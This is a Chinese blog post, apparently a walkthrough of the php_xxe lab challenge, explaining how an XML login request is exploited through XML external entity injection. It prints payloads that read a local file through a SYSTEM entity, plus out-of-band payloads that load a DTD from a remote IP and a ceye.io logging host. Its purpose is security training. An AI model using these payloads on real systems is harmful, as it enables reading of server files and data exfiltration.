php_xxe

最新推荐文章于 2024-09-12 09:31:27 发布
最新推荐文章于 2024-09-12 09:31:27 发布
阅读量136 收藏
点赞数 1
分类专栏: WEB安全基础 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52579508/article/details/140496733
版权

image.png
这是xxe_lab 里面的php xxe的题目
看这个xxe 的 漏洞 一般看包里面是否存在<> 这种标签 或者 存在xml 的格式
抓包查看
输入 admin 123456 之后
image.png
正常的一般提交数据 都是 username = admin password= 123456
这里却不是这样的
很想html 和xml 的 语法
image.png
发送过去返回的格式就是 text/html

image.png
这里 <!ENTITY f 这里的 f
在下面xml 数据里面要有 相当于是个变量
&f;
所以就输出了 123123

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///C://123.txt">
]>
<user><username>&f;</username><password>admin</password></user>

外带

payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://211.159.223.136:888/xs.dtd">%aaa;%ccc;%ddd;]>
<user><username>&aaa;</username><password>1</password></user>


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.100.123.wvt4ld.ceye.io/xxe_test">
%remote;]>
<root/>
<user><username>&remote;</username><password>1</password></user>

image.png
image.png

小龙_(R0 Team)
关注
专栏目录
Vulhub-php_xxe
Mccc_li的博客
04-16 836
test
xxe
r_deku的博客
11-19 302
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、xxe漏洞简介二、xxe漏洞利用1.实验一:有回显读本地敏感文件(Normal XXE)2.实验二:无回显读取本地敏感文件(Blind OOB XXE) 前言 认识XXE之前必学认识XML,XML 指可扩展标记语言(Extensible Markup Language) XML是用于 标记电子文件 使其具有 结构性 的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包
Vulhub--php_xxe
firecjh的博客
06-10 167
Vulhub上的php xml实体注入复现过程。启动环境访问版本查看www目录重新设置端口将Bp抓的包发送给repeater将GET包改为POST并写入payload后发送查看响应。
XXE-lab-master靶场:PHP_xxe
weixin_68416970的博客
07-30 839
XXE-lab-master:PHP_xxe的练习教程
XXE—实体注入、XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2105
XXE—实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
SCAN_XXE:利用XML XXE漏洞
05-07
Python中,虽然不像PHP那样常见,但也有处理XML的库,如`xml.etree.ElementTree`,如果不正确使用,也可能引发XXE漏洞。为了防止这种情况,开发者应该遵循以下最佳实践: 1. **禁用外部实体解析**:在解析XML时,...
pocsuite3框架编写php_xxe的poc
willow_liang的博客
10-16 317
pocsuite3框架编写php_xxe的poc 环境地址:php_xxe py脚本 from collections import OrderedDict from urllib.parse import urljoin import re from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE from pocsuite3.api import REVERSE_PAYLOAD
PHPXXE漏洞靶场详解
sixoneyvye的博客
12-09 4008
PHPXXE漏洞靶场详解 00x1 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 00x2 XML基础知识 XML是一...
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 797
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
以太坊开发环境
禅与代码的艺术
09-07 1351
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 612
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1732
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
PLC(电力载波通信)网络机制介绍
u010467490的博客
09-08 1225
电力载波通讯即PLC,是英文Power line Carrier的简称。电力载波是电力系统特有的通信方式,电力载波通讯是指利用现有电力线,通过载波方式将模拟或数字信号进行高速传输的技术。最大特点是不需要重新架设网络,只要有电线,就能进行数据传递。CCO在所有相线上工作,STA只在一个相线上工作,不同相位具有不同的过零时间,CCO通过采集STA的过零时间确定STA的相位时分多址传输,设备独占间隙,数据包根据指定时间进行发送载波侦听多路访问/冲突检测,设备共同占有间隙,判断信道空闲,竞争进行发送。
第四届长城杯部分wp
weixin_74427106的博客
09-09 723
还是太菜了,要经常练了。
搭建 WordPress 及常见问题与解决办法
hacker__的博客
09-10 1033
本文旨在介绍如何在服务器上搭建 WordPress 网站,并提供一些常见问题的解决办法。
PHP随时随地预订民宿酒店预订系统小程序源码
最新发布
2401_84413903的博客
09-12 385
在这个快节奏的时代里,“随时随地预订民宿酒店预订系统”无疑成为了我们旅行中的得力助手。它不仅让我们摆脱了繁琐的预订流程和时间限制,更让我们能够随心所欲地规划自己的旅行路线和住宿体验。无论你是想要一场说走就走的旅行,还是想要精心策划一次难忘的假期,都不妨试试这个预订系统吧!相信它一定会让你的旅行变得更加自由、便捷和美好!
win权限提升总结
2301_80064376的博客
09-10 1805
在现代计算环境中,Windows权限提升是关键的安全话题。它涉及利用系统漏洞或配置错误,从而实现从普通用户权限到更高级别权限的转变。这一过程对于安全研究人员和网络攻击者都具有重要意义,前者致力于发现并修补这些漏洞以增强系统安全,后者则可能利用这些漏洞进行恶意操作。因此,深入了解Windows权限提升的机制及其防御措施,对于维护网络安全环境是至关重要的。
大模型的第一个杀手级应用场景出来了
allwefantasy的专栏
09-09 879
大家终于都意识到大模型首先改变的是软件行业自己,而软件的根基是代码生成。代码生成第一波就是AI辅助开发,这个会是大模型第一个杀手级应用。大家苦苦逼问自己的大模型杀手级应用,为什么会是辅助编程,这里说下什么:必须吃狗粮,颠覆性技术连自己的领域都颠覆不了,那还叫啥颠覆性技术。允许出错。AI辅助开发具有良好的容错率,允许出错,这个相当重要,也是当前大模型在其他领域目前难以落地的根本原因。市场规模大,整...
攻防世界 unseping
beiweixiaotian66的博客
09-06 600
一丢丢小练习
PHP XXE漏洞利用详解:file_get_contents与simplexml_load_string
"本资源主要讲解了如何编写简单的XXE(XML External Entity)漏洞代码,通过四个关键知识点:file_get_contents函数、php://input、simplexml_load_string函数以及XML注入回显输出,来阐述XXE漏洞的基本利用方式。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值